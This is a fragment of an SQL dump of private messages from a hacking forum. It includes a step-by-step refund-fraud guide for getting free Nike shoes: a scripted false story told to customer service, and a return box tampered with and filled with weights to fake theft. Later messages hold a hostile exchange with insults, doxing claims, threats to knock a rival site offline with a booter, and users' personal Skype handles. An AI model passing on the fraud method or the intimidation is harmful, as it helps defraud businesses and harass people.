upset because 1 of the shoes are missing from the box. She is fairly fond of shoes so i know she wouldn\'t be joking. I told her to google your number so that I could ring you. So... i was wondering if I could get some help.\"\r\n\r\n\r\n Step 2\r\n ================================================================================?===\r\n\r\n Now they will ask for your email. After a couple of days they will send you out a box to put the shoes in for them to inspect them. This next trick is called the box method. The box method is getting a company to think that your item was stolen.\r\n To do the box method, (In this case you received a shipping label in your email) get a box.\r\n Tape the box shut, and put the shipping label a bit out of the way of the opening of the box. It needs to remain legible. Break into the box as if you are trying to steal whatever is inside. Now grab a weight of some sort, this can be a phonebook, rocks, etc. and stick them in the box. Now messily tape the box shut. Ship it out.\r\n Wait 3 days, since the shipping is a two day label. If you haven\'t received a call from Nike yet, call them and ask if you can check on the replacement. They will do a little investigation and say that the box was empty. At this point, they will either issue you a replacement, or they won’t. If they don\'t...\r\n FLIP THE FUCK OUT.', '1346963206', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1351', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'new group', '0', 'since you\'re going to be co leader for my group.\r\n\r\nhttp://l33thacking.net/showthread.php?tid=345&pid=1632#pid1632\r\n\r\nWhich one do you like?', '1346963672', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1355', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Nike', '0', '[quote=\'iTzIpod\']\r\n[quote=\'??????Z\']\r\nNike Method, Please leave positive rep if this helped you. also let me know how you get on with this.\r\n\r\n How to Get a Free Pair of Nikes\r\n\r\n\r\n\r\n Step 1\r\n ================================================================================?===\r\n\r\n Okay, 1st of all you need to ring this number: 1300 65 64 53.\r\n Once you have gotten hold of someone, say the story below.\r\n\r\n\r\n \"Hi, my name is Michael, I recently purchased two pairs of [the nike shoes you want] for my children for passing there HSC exams. A pair of [any pair of nike shoes] for my son, and a pair [the nike shoes you want.] for my Daughter. My daughter is in a before school study session, so we had to rush her up to the school once she had gotten her present, so she didn\'t have a chance to open up the shoes.. My son is crazy about his, and has been showing them off to his mates all evening. Thankfully he is out there instead of in here. [A laugh here for good measure ]\r\n But my problem is that about 30 minutes ago my daughter gave me a call, and she is upset because 1 of the shoes are missing from the box. She is fairly fond of shoes so i know she wouldn\'t be joking. I told her to google your number so that I could ring you. So... i was wondering if I could get some help.\"\r\n\r\n\r\n Step 2\r\n ================================================================================?===\r\n\r\n Now they will ask for your email. After a couple of days they will send you out a box to put the shoes in for them to inspect them. This next trick is called the box method. The box method is getting a company to think that your item was stolen.\r\n To do the box method, (In this case you received a shipping label in your email) get a box.\r\n Tape the box shut, and put the shipping label a bit out of the way of the opening of the box. It needs to remain legible. Break into the box as if you are trying to steal whatever is inside. Now grab a weight of some sort, this can be a phonebook, rocks, etc. and stick them in the box. Now messily tape the box shut. Ship it out.\r\n Wait 3 days, since the shipping is a two day label. If you haven\'t received a call from Nike yet, call them and ask if you can check on the replacement. They will do a little investigation and say that the box was empty. At this point, they will either issue you a replacement, or they won’t. If they don\'t...\r\n FLIP THE FUCK OUT.\r\n[/quote]\r\n\r\nI\'ve seen this method already :/\r\n\r\nDidn\'t work out\r\n[/quote]\r\n\r\n\r\nah bad look, i know its worked for a few people but not everyone.', '1346963879', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1361', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: new group', '0', 'That\'s what I wanted to do, But i\'m not amazing at photoshop. I need to get my brother to help me aha.', '1346963934', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1365', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Nike', '0', 'yeah would have been nice. it doesnt work where i live so i had to pay for my nike jordans\r\n', '1346964031', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1367', '61', '82', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: new group', '0', '[quote=\'iTzIpod\']\r\n[quote=\'NXK\']\r\nThat\'s what I wanted to do, But i\'m not amazing at photoshop. I need to get my brother to help me aha.\r\n[/quote]\r\n\r\nI don\'t know how to do that :p\r\n[/quote]\r\n\r\nI\'m going to work on it now.', '1346964178', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1376', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Warning', '0', 'http://l33thacking.net/showthread.php?tid=347\r\n\r\nIn case one of your staff members removes:\r\n\r\n[code]\r\nHello,\r\n\r\nThe only reason I have joined is to post this final warning.\r\n\r\nYou may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links.\r\n\r\nI understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong.\r\n\r\nThis is your first and final warning, next time I won\'t waste my time warning you.\r\n\r\n~Hostpro\r\n[/code]\r\n\r\n~Hostpro', '1346966442', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1378', '178', '2', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"2\";}}', '2', 'Warning', '0', 'http://l33thacking.net/showthread.php?tid=347\r\n\r\nIn case one of your staff members removes:\r\n\r\n[code]\r\nHello,\r\n\r\nThe only reason I have joined is to post this final warning.\r\n\r\nYou may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links.\r\n\r\nI understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong.\r\n\r\nThis is your first and final warning, next time I won\'t waste my time warning you.\r\n\r\n~Hostpro\r\n[/code]\r\n\r\n~Hostpro', '1346966489', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1383', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\nhttp://l33thacking.net/showthread.php?tid=347\r\n\r\nIn case one of your staff members removes:\r\n\r\n[code]\r\nHello,\r\n\r\nThe only reason I have joined is to post this final warning.\r\n\r\nYou may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links.\r\n\r\nI understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong.\r\n\r\nThis is your first and final warning, next time I won\'t waste my time warning you.\r\n\r\n~Hostpro\r\n[/code]\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nFuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community.\r\n\r\nI have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. \r\n[/quote]\r\n\r\nSilly HF skid, my dox is public and always has been, I even updated it for everybody.\r\n\r\nThis site is just HF clone #23645\r\n\r\nYou\'re not the first idiot to think he runs the place and you definitely won\'t be the last.\r\n\r\n~Hostpro', '1346966787', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1386', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\nhttp://l33thacking.net/showthread.php?tid=347\r\n\r\nIn case one of your staff members removes:\r\n\r\n[code]\r\nHello,\r\n\r\nThe only reason I have joined is to post this final warning.\r\n\r\nYou may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links.\r\n\r\nI understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong.\r\n\r\nThis is your first and final warning, next time I won\'t waste my time warning you.\r\n\r\n~Hostpro\r\n[/code]\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nFuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community.\r\n\r\nI have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. \r\n[/quote]\r\n\r\nSilly HF skid, my dox is public and always has been, I even updated it for everybody.\r\n\r\nThis site is just HF clone #23645\r\n\r\nYou\'re not the first idiot to think he runs the place and you definitely won\'t be the last.\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nPublic? Lol I made one myself. I\'m not from HF so I have no idea where you brought HF from bitch, even if I am a SKID but guess what I have reported your site to PayPal so your source of income is gone. \r\n[/quote]\r\n\r\nYou honestly make no sense, what have you reported my site for?\r\n\r\nThe Profiters is all 100% legitimate content, unlike this wannabe hacking community. Before you start \"reporting\" sites I suggest you take a look in the mirror. \r\n\r\n~Hostpro\r\n\r\np.s I highly doubt you did anything anyway :roflol:', '1346967145', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1392', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\nhttp://l33thacking.net/showthread.php?tid=347\r\n\r\nIn case one of your staff members removes:\r\n\r\n[code]\r\nHello,\r\n\r\nThe only reason I have joined is to post this final warning.\r\n\r\nYou may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links.\r\n\r\nI understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong.\r\n\r\nThis is your first and final warning, next time I won\'t waste my time warning you.\r\n\r\n~Hostpro\r\n[/code]\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nFuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community.\r\n\r\nI have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. \r\n[/quote]\r\n\r\nSilly HF skid, my dox is public and always has been, I even updated it for everybody.\r\n\r\nThis site is just HF clone #23645\r\n\r\nYou\'re not the first idiot to think he runs the place and you definitely won\'t be the last.\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nPublic? Lol I made one myself. I\'m not from HF so I have no idea where you brought HF from bitch, even if I am a SKID but guess what I have reported your site to PayPal so your source of income is gone. \r\n[/quote]\r\n\r\nYou honestly make no sense, what have you reported my site for?\r\n\r\nThe Profiters is all 100% legitimate content, unlike this wannabe hacking community. Before you start \"reporting\" sites I suggest you take a look in the mirror. \r\n\r\n~Hostpro\r\n\r\np.s I highly doubt you did anything anyway :roflol:\r\n[/quote]\r\n\r\nI just found out that the warning you sent me was regarding iTzIpod, if he was advertising then why did you come on my dick?\r\n\r\nActually there is a lot of copyrighted content and BH content, I have proof and if I was so wrong then why are you denied support on MyBB Community? \r\n[/quote]\r\n\r\n[img]http://i.imgur.com/dLn7d.png[/img]\r\n\r\nApparently you black mailed him with his ip :lol:\r\n\r\nWith methods like that I can see this forum will go far ;)\r\n\r\nAnd I am denied support as after a merge there were threads offering premium MyBB themes for free. All of which is cleared out now.\r\n\r\n~Hostpro', '1346967426', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1394', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Nike', '0', '[quote=\'iTzIpod\']\r\n[quote=\'??????Z\']\r\nyeah would have been nice. it doesnt work where i live so i had to pay for my nike jordans\r\n\r\n[/quote]\\\r\n\r\n\r\n\r\nThat sucks.. :/\r\n[/quote]\r\n\r\nit does. but jordans are worth paying for :)', '1346967458', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1400', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\nhttp://l33thacking.net/showthread.php?tid=347\r\n\r\nIn case one of your staff members removes:\r\n\r\n[code]\r\nHello,\r\n\r\nThe only reason I have joined is to post this final warning.\r\n\r\nYou may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links.\r\n\r\nI understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong.\r\n\r\nThis is your first and final warning, next time I won\'t waste my time warning you.\r\n\r\n~Hostpro\r\n[/code]\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nFuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community.\r\n\r\nI have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. \r\n[/quote]\r\n\r\nSilly HF skid, my dox is public and always has been, I even updated it for everybody.\r\n\r\nThis site is just HF clone #23645\r\n\r\nYou\'re not the first idiot to think he runs the place and you definitely won\'t be the last.\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nPublic? Lol I made one myself. I\'m not from HF so I have no idea where you brought HF from bitch, even if I am a SKID but guess what I have reported your site to PayPal so your source of income is gone. \r\n[/quote]\r\n\r\nYou honestly make no sense, what have you reported my site for?\r\n\r\nThe Profiters is all 100% legitimate content, unlike this wannabe hacking community. Before you start \"reporting\" sites I suggest you take a look in the mirror. \r\n\r\n~Hostpro\r\n\r\np.s I highly doubt you did anything anyway :roflol:\r\n[/quote]\r\n\r\nI just found out that the warning you sent me was regarding iTzIpod, if he was advertising then why did you come on my dick?\r\n\r\nActually there is a lot of copyrighted content and BH content, I have proof and if I was so wrong then why are you denied support on MyBB Community? \r\n[/quote]\r\n\r\n[img]http://i.imgur.com/dLn7d.png[/img]\r\n\r\nApparently you black mailed him with his ip :lol:\r\n\r\nWith methods like that I can see this forum will go far ;)\r\n\r\nAnd I am denied support as after a merge there were threads offering premium MyBB themes for free. All of which is cleared out now.\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nLol I don\'t even have him on Skype, don\'t flip words. You\'ll see in a couple of days what I can do. \r\n[/quote]\r\n\r\nOh, the owner of the great L33t Hacking community has to wait \r\ndays just to find a booter :lol:\r\n\r\n~Hostpro', '1346967705', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1405', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\nhttp://l33thacking.net/showthread.php?tid=347\r\n\r\nIn case one of your staff members removes:\r\n\r\n[code]\r\nHello,\r\n\r\nThe only reason I have joined is to post this final warning.\r\n\r\nYou may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links.\r\n\r\nI understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong.\r\n\r\nThis is your first and final warning, next time I won\'t waste my time warning you.\r\n\r\n~Hostpro\r\n[/code]\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nFuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community.\r\n\r\nI have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. \r\n[/quote]\r\n\r\nSilly HF skid, my dox is public and always has been, I even updated it for everybody.\r\n\r\nThis site is just HF clone #23645\r\n\r\nYou\'re not the first idiot to think he runs the place and you definitely won\'t be the last.\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nPublic? Lol I made one myself. I\'m not from HF so I have no idea where you brought HF from bitch, even if I am a SKID but guess what I have reported your site to PayPal so your source of income is gone. \r\n[/quote]\r\n\r\nYou honestly make no sense, what have you reported my site for?\r\n\r\nThe Profiters is all 100% legitimate content, unlike this wannabe hacking community. Before you start \"reporting\" sites I suggest you take a look in the mirror. \r\n\r\n~Hostpro\r\n\r\np.s I highly doubt you did anything anyway :roflol:\r\n[/quote]\r\n\r\nI just found out that the warning you sent me was regarding iTzIpod, if he was advertising then why did you come on my dick?\r\n\r\nActually there is a lot of copyrighted content and BH content, I have proof and if I was so wrong then why are you denied support on MyBB Community? \r\n[/quote]\r\n\r\n[img]http://i.imgur.com/dLn7d.png[/img]\r\n\r\nApparently you black mailed him with his ip :lol:\r\n\r\nWith methods like that I can see this forum will go far ;)\r\n\r\nAnd I am denied support as after a merge there were threads offering premium MyBB themes for free. All of which is cleared out now.\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nLol I don\'t even have him on Skype, don\'t flip words. You\'ll see in a couple of days what I can do. \r\n[/quote]\r\n\r\nOh, the owner of the great L33t Hacking community has to wait \r\ndays just to find a booter :lol:\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nI run LH on multiple hosts, lets see if you can really knock it down. \r\n[/quote]\r\n\r\nWho said I\'m going to knock it down :?:\r\n\r\nYou\'re the all mighty hacker here.\r\n\r\n~Hostpro', '1346967906', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1410', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Group', '0', 'they\'re just in the \"beta\" stage. Not done yet.', '1346968392', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1412', '178', '1', '178', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Warning', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'The Host\']\r\nhttp://l33thacking.net/showthread.php?tid=347\r\n\r\nIn case one of your staff members removes:\r\n\r\n[code]\r\nHello,\r\n\r\nThe only reason I have joined is to post this final warning.\r\n\r\nYou may have bought advertising on my forum, but that doesn\'t mean you can send your idiotic staff to spam my forum with your links.\r\n\r\nI understand this is a new forum and you seem to be very desperate to gain some sort of a member base but that way you are going about it is all wrong.\r\n\r\nThis is your first and final warning, next time I won\'t waste my time warning you.\r\n\r\n~Hostpro\r\n[/code]\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nFuck you bitch, I sent to only those who ever members of my website. Another thing you have been on iTzIpods dick to make him inactive on my website and tried to drive away members from my site. I had enough of you bitch, I\'m going to fuck you up now. After all you messed with a founder of a hacker community.\r\n\r\nI have your DOX and reported your site already to your host and Cloudflare. I have your sites IP and enjoy the downtime from now on. \r\n[/quote]\r\n\r\nSilly HF skid, my dox is public and always has been, I even updated it for everybody.\r\n\r\nThis site is just HF clone #23645\r\n\r\nYou\'re not the first idiot to think he runs the place and you definitely won\'t be the last.\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nPublic? Lol I made one myself. I\'m not from HF so I have no idea where you brought HF from bitch, even if I am a SKID but guess what I have reported your site to PayPal so your source of income is gone. \r\n[/quote]\r\n\r\nYou honestly make no sense, what have you reported my site for?\r\n\r\nThe Profiters is all 100% legitimate content, unlike this wannabe hacking community. Before you start \"reporting\" sites I suggest you take a look in the mirror. \r\n\r\n~Hostpro\r\n\r\np.s I highly doubt you did anything anyway :roflol:\r\n[/quote]\r\n\r\nI just found out that the warning you sent me was regarding iTzIpod, if he was advertising then why did you come on my dick?\r\n\r\nActually there is a lot of copyrighted content and BH content, I have proof and if I was so wrong then why are you denied support on MyBB Community? \r\n[/quote]\r\n\r\n[img]http://i.imgur.com/dLn7d.png[/img]\r\n\r\nApparently you black mailed him with his ip :lol:\r\n\r\nWith methods like that I can see this forum will go far ;)\r\n\r\nAnd I am denied support as after a merge there were threads offering premium MyBB themes for free. All of which is cleared out now.\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nLol I don\'t even have him on Skype, don\'t flip words. You\'ll see in a couple of days what I can do. \r\n[/quote]\r\n\r\nOh, the owner of the great L33t Hacking community has to wait \r\ndays just to find a booter :lol:\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nI run LH on multiple hosts, lets see if you can really knock it down. \r\n[/quote]\r\n\r\nWho said I\'m going to knock it down :?:\r\n\r\nYou\'re the all mighty hacker here.\r\n\r\n~Hostpro\r\n[/quote]\r\n\r\nIs your site down? OPPS :whistle:\r\n[/quote]\r\n\r\nIt\'s clearly up :?:', '1346968401', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1437', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Unique?', '0', 'hey, how would i go abouts joining the Unique group?', '1346974024', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1439', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hello.', '0', 'hey there. i saw your post about the reviewer group and was wondering that if the group is made could i become a member of that group. i more or less always try out E-books etc and give my thoughts so i think it would be a good group for me :)', '1346974272', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1443', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Unique?', '0', '[quote=\'iTzIpod\']\r\n[quote=\'??????Z\']\r\nhey, how would i go abouts joining the Unique group?\r\n[/quote]\r\n\r\nI recommend you get more active and known in the forum. Because basically right now, mostly everyone is in it..\r\n[/quote]\r\n\r\nokay :)', '1346975074', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1449', '112', '82', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: Unique?', '0', '[quote=\'iTzIpod\']\r\n[quote=\'??????Z\']\r\n[quote=\'iTzIpod\']\r\n[quote=\'??????Z\']\r\nhey, how would i go abouts joining the Unique group?\r\n[/quote]\r\n\r\nI recommend you get more active and known in the forum. Because basically right now, mostly everyone is in it..\r\n[/quote]\r\n\r\nokay :)\r\n[/quote]\r\n\r\nSorry. \r\n[/quote]\r\n\r\nIts not a problem mate.', '1346976927', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1459', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hello.', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????Z\']\r\nhey there. i saw your post about the reviewer group and was wondering that if the group is made could i become a member of that group. i more or less always try out E-books etc and give my thoughts so i think it would be a good group for me :)\r\n[/quote]\r\n\r\nSure no problem. The group still has some time to become official til then you would have to remain HQ and active. \r\n[/quote]\r\n\r\nOkay mate. will do', '1347110501', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1471', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Help', '0', '[quote=\'t3h jok3r\']\r\nCan I have your Skype? \r\n[/quote]\r\n\r\nsure\r\n\r\nxwoogiex\r\n\r\nis my personal one. Ill just give you that one since I don\'t use my other one anymore.', '1347133416', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1474', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\nYo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. \r\n[/quote]\r\n\r\nI am actually thinking of stepping down from Site Mod, I am very busy with school.\r\n[/quote]\r\n\r\nAre you sure?\r\n[/quote]\r\n\r\nYeah sorry, I need to focus on school this year, I will be on everyday though.\r\n\r\n:)\r\n[/quote]\r\nNo problem, would you like to be a Mod or elite? \r\n[/quote]\r\n\r\nDoesn\'t matter, I will be on about every day also.\r\n[/quote]\r\n\r\nWould you be able to post? \r\n[/quote]\r\n\r\nYeah, sorry I wasn\'t online....my password was messed up.', '1347137439', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1479', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Ey', '0', 'You said you would edit a psd for me and now I want you to do that.Firstly thank you for doing this :D\r\nFor every sold ebook i will pay you 5-10percent\r\nSo my 3 Ebooks only cost 10 dollars you will get 0.5 - 1.0 dollar per sold ebook. \r\nCorrect any grammatical errors you see.\r\nLink of psd file:http://www.mediafire.com/?zcbuzjiy6hlaiwz\r\n\r\nBy thread title write this : 3 Ebooks for 10 Dollars\r\n\r\nUnder about write this: Im selling 3 Money making Ebooks for the price of one. \r\nAll of the three Ebooks were written by me. All of them are working methods. Proof is shown in all the ebooks.\r\n\r\nUnder Features/Prices write this: Feature 1 - 10.00 Dollars/8.00 Euros\r\nFeature 2 - 38 pages\r\nFeature 3 - With Pictures.\r\nFeature 4 - Skype Help\r\nFeature 5 - Resale rights are 30.00 Dollars\r\n\r\nPls delete the yourskype and yourmsn part.\r\nThanks alot. \r\nSirchamp\r\n', '1347185775', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1481', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\nYo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. \r\n[/quote]\r\n\r\nI am actually thinking of stepping down from Site Mod, I am very busy with school.\r\n[/quote]\r\n\r\nAre you sure?\r\n[/quote]\r\n\r\nYeah sorry, I need to focus on school this year, I will be on everyday though.\r\n\r\n:)\r\n[/quote]\r\nNo problem, would you like to be a Mod or elite? \r\n[/quote]\r\n\r\nDoesn\'t matter, I will be on about every day also.\r\n[/quote]\r\n\r\nWould you be able to post? \r\n[/quote]\r\n\r\nYeah, sorry I wasn\'t online....my password was messed up.\r\n[/quote]\r\n\r\nLol thanks. What happened to your password? \r\n[/quote]\r\n\r\nit kept saying it was wrong so I had to reset it.', '1347196964', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1483', '53', '82', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'ey again', '0', 'You dont have to make that thread design for me. I did it myself :D\r\nBut I have a request.. can you please add me on skype so we can talk..my skype: marco.phono1\r\nIts important :D\r\nRegards', '1347201426', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1489', '112', '1', '112', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'The forwarder :)', '0', 'hey man, would like to get one of the email forwarders. hopefully you find these posts suitable. thanks\r\n\r\nhttp://l33thacking.net/thread-373.html\r\nhttp://l33thacking.net/thread-356.html\r\nhttp://l33thacking.net/thread-340.html', '1347209967', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('1494', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'JakeUS\']\r\n[quote=\'t3h jok3r\']\r\nYo, I was thinking if you are coming online can you please make at least 1 post then go offline because LH is dependent on content at the moment. \r\n[/quote]\r\n\r\nI am actually thinking of stepping down from Site Mod, I am very busy with school.\r\n[/quote]\r\n\r\nAre you sure?\r\n[/quote]\r\n\r\nYeah sorry, I need to focus on school this year, I will be on everyday though.\r\n\r\n:)\r\n[/quote]\r\nNo problem, would you like to be a Mod or elite? \r\n[/quote]\r\n\r\nDoesn\'t matter, I will be on about every day also.\r\n[/quote]\r\n\r\nWould you be able to post? \r\n[/quote]\r\n\r\nYeah, sorry I wasn\'t online....my password was messed up.\r\n[/quote]\r\n\r\nLol thanks. What happened 